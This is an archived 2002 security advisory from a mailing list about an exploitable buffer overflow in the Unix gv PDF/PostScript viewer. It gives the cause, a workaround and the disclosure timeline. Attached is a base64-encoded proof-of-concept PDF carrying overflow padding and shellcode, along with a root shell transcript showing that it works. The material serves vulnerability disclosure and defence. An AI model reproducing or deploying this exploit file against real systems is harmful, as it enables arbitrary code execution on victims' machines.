Full Disclosure mailing list archives
iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv
From: dendler () idefense com (David Endler)
Date: Thu, 26 Sep 2002 11:56:02 -0400 (EDT)
This is a multipart message in MIME format --01628847 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDEFENSE Security Advisory 09.26.2002 Exploitable Buffer Overflow in gv DESCRIPTION The gv program that is shipped on many Unix systems contains a buffer overflow which can be exploited by an attacker sending a malformed postscript or Adobe pdf file. The attacker would be able to cause arbitrary code to run with the privileges of the victim on his Linux computer. The gv program is a PDF and postscript viewing program for Unix which interfaces with the ghostscript interpreter. It is maintained at http://wwwthep.physik.uni-mainz.de/~plass/gv/ by Johannes Plass. This particular security vulnerability occurs in the source code where an unsafe sscanf() call is used to interpret PostScript and PDF files. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2001-0832 to this issue. ANALYSIS In order to perform exploitation, an attacker would have to trick a user into viewing a malformed PDF or PostScript file from the command line. This may be somewhat easier for Unix based email programs that associate gv with email attachments. Since gv is not normally installed setuid root, an attacker would only be able to cause arbitrary code to run with the privileges of that user. Other programs that utilize derivatives of gv, such as ggv or kghostview, may also be vulnerable in similiar ways. A proof of concept exploit for Red Hat Linux designed by zen-parse is attached to this message. It packages the overflow and shellcode in the "%%PageOrder:" section of the PDF. [root@victim]# ls -al /tmp/itworked /bin/ls: /tmp/itworked: No such file or directory [root@victim]# gv gv-exploit.pdf [root@victim]# ls -al /tmp/itworked - -rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked [root@victim]# DETECTION This vulnerability affects the latest version of gv, 3.5.8. An exploit has been tested on Red Hat Linux 7.3. WORKAROUND To avoid potential exploitation, users can select alternatives to gv such as Kghostview (included with the KDE desktop environment) for instance. Additionally, the vulnerability does not seem to be exploitable when a file is opened from the gv interface instead of the command line. VENDOR RESPONSE The author could not be contacted, and the main home page has not been updated since 1997. Coordinated public disclosure was scheduled for September 26, 2002 with Unix vendors. DISCLOSURE TIMELINE 8/23/2002 Disclosed to iDEFENSE 9/6/2002 Disclosed to vendor (plass () thep physik uni-mainz de) by iDEFENSE 9/6/2002 Disclosed to iDEFENSE clients 9/12/2002 Disclosed to Unix vendors 9/13/2002 Second vendor disclosure attempt 9/26/2002 Public Disclosure CREDIT This issue was exclusively disclosed to iDEFENSE by zen-parse (zen-parse () gmx net). Get paid for vulnerability research http://www.idefense.com/contributor.html David Endler, CISSP Director, Technical Intelligence iDEFENSE, Inc. 14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071 dendler () idefense com www.idefense.com -----BEGIN PGP SIGNATURE----- Version: PGP 7.1.2 Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A iQA/AwUBPZMs8ErdNYRLCswqEQKKnACg87389/B9tzoiBDV8zu/M68/TFO0AnjJV 7Yn3xdN19+K9frKhYSDgxSXX =weJR -----END PGP SIGNATURE----- --01628847 Content-Type: application/pdf; name="gv-exploit.pdf" Content-Transfer-Encoding: Base64 Content-Disposition: attachment; filename="gv-exploit.pdf" JSFQUy1BZG9iZS0zLjANCiUlQ3JlYXRvcjogZ3JvZmYgMS4xNiAod2l0aCBtb2RpZmljYXRpb25z IGJ5IHplbi1wYXJzZSBieSBoYW5kIDEuMDBhKQ0KJSVDcmVhdGlvbkRhdGU6IFNhdCBKdW4gMTUg MTU6MzBpc2gNCiUlUGFnZU9yZGVyOiBBQUFBQUFBQUFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFC Q0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJD REFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNE QUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RB QkNEYWFhYWJiYmJjY2NjZGRkZGVlZWVmZmZmZ2dnZ2hoaGhpaWlpampqamtra2tsbGxsbW1tbW5u bm5vb29vcHBwcHFxcXFycnJyc3Nzc3R0dHR1dXV1dnZ2dnd3d3eg8v+/QEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAvPz//78xwGgv L3NoaC9iaW6J41BoLy9zaGgvYmluieFQaC1wcGOJ5lBocmtlZGhpdHdvaHRtcC9oRlN9L2hoJHtJ aHRvdWOJ4lBSVlFUWVBUWrAhSEhISEhISEhISEhISEhISEhISEhISM2ADQolJUVuZENvbW1lbnRz DQolJUVPRg0K --01628847--
Current thread:
- iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv David Endler (Sep 26)